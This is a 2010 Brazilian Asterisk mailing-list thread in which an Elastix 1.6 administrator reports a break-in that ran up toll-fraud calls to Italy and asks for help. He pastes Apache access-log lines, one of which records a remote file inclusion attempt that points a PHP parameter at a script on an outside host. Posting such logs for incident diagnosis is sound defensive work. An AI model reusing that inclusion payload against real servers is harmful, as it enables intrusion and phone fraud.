[AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6

Nielsen Alves de Oliveira nielsen em freesolutions.com.br
Segunda Novembro 22 14:51:04 BRST 2010


Bom eles autenticaram numa boa ? Vc está utilizando senhas fortes ?
provavelmente eles monitoraram seu server e conseguiram uma senha ... Muito
estranho vc fez uma auditoria nos logs ? Pode ser que algum de seus clientes
esteja com trojan, este enviou as informações e no meio delas foram os dados
de autenticação.

Pensou nisso tudo ?

No final das contas é preciso a auditoria para identificar a origem da
invasão.

Em 22 de novembro de 2010 13:40, Gleidison Sampaio <
gleidison.sampaio em hotmail.com> escreveu:

>  Sim no Elastix 1.6
>
> ele se encontra em um Co-location dentro da GVT em uma maquina virtual, com
> IP Publico e tenho ramais distribuidos em 5 filiais diferentes, esses ramais
> estao logados atraves de Linksys SPA2102 todos estes atras de Firewall, e o
> que notei no CDR foi que fizeram ligaçoes apenas um ramal, e em duas horas
> durante a madrugada os caras arrebentaram de ligar.
>
>
>
>
>
>
>
>
>
> 2010-11-21 21:14:01 XXXX00393396976261 SIP/TRUNK  SIP/TRUNKANSWERED 1045
>
>
>
>
>
>
>
>
>
> Att;
>
> *Gleidison C. Sampaio*
>
>
>
>
>
> ------------------------------
> From: nielsen em freesolutions.com.br
> Date: Mon, 22 Nov 2010 13:27:16 -0300
>
> To: asteriskbrasil em listas.asteriskbrasil.org
> Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
>
>
> Opa, foi no seu ELASTIX 1.6?
>
> Qual a posição que se encontra seu servidor voip na sua rede ?
>
> Em 22 de novembro de 2010 13:20, Gleidison Sampaio <
> gleidison.sampaio em hotmail.com> escreveu:
>
>  Sidinei,
>
> Obrigado pela Resposta,
>
> cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes
> para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo.
> alguem poderia me ajudar a bloquear isso.
>
> /var/log/httpd/access_log
>
> 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs
> HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner"
> 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET
> /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt?
> HTTP/1.1" 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
>
>
>
>
> Att;
>
> *Gleidison C. Sampaio*
>
>
>
>
>
>
> ------------------------------
> From: sidnei_rp em ig.com.br
> To: asteriskbrasil em listas.asteriskbrasil.org
> Date: Mon, 22 Nov 2010 14:00:10 -0200
> Subject: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
>
> Não, pois estão todas as linhas comentadas (é só um exemplo).
>
> *De:* asteriskbrasil-bounces em listas.asteriskbrasil.org [mailto:
> asteriskbrasil-bounces em listas.asteriskbrasil.org] *Em nome de *Gleidison
> Sampaio
> *Enviada em:* segunda-feira, 22 de novembro de 2010 13:40
> *Para:* Asterisk Lista
> *Assunto:* [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6
>
> Boa tarde Lista!
>
> hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao,
> e gostaria de saber se isso da permissao a algum acesso no meu servidor
>
> /etc/asterisk/users.conf
>
> ;[6000]
> ;fullname = Joe User
> ;email = joe em foo.bar
> ;secret = xxxx
> ;zapchan = 1
> ;hasvoicemail = yes
> ;vmsecret = xxxx
> ;hassip = yes
> ;hasiax = no
> ;hash323 = no
> ;hasmanager = no
> ;callwaiting = no
> ;context = international
>
>
>
>
> Att;
>
> *Gleidison C. Sampaio*
>
>
>
>
>
> _______________________________________________
> KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk.
> - Hardware com alta disponibilidade de recursos e qualidade KHOMP
> - Suporte técnico local qualificado e gratuito
> Conheça a linha completa de produtos KHOMP em www.khomp.com.br
> _______________________________________________
> Temos tudo para seu projeto VoIP com Asterisk!
> Descontos especiais para assinantes da AsteriskBrasil.org.
> Registre-se e receba um cupom exclusivo de desconto!
> Acesse agora www.voipmania.com.br
> ______________________________________________
> Lista de discussões AsteriskBrasil.org
> AsteriskBrasil em listas.asteriskbrasil.org
> http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil
> ______________________________________________
> Para remover seu email desta lista, basta enviar um email em branco para
> asteriskbrasil-unsubscribe em listas.asteriskbrasil.org
>



-- 
At.


           ____________________________
                  Nielsen Alves de Oliveira
     Consultor em Sistemas Computacionais
                              CIO
                      Free Solutions
                Telefone: (65) 3025-7356
            Celular: (65) 9287-5331 (Vivo)
-------------- Próxima Parte ----------
Um anexo em HTML foi limpo...
URL: http://listas.asteriskbrasil.org/pipermail/asteriskbrasil/attachments/20101122/113e5db4/attachment-0001.htm 


Mais detalhes sobre a lista de discussão AsteriskBrasil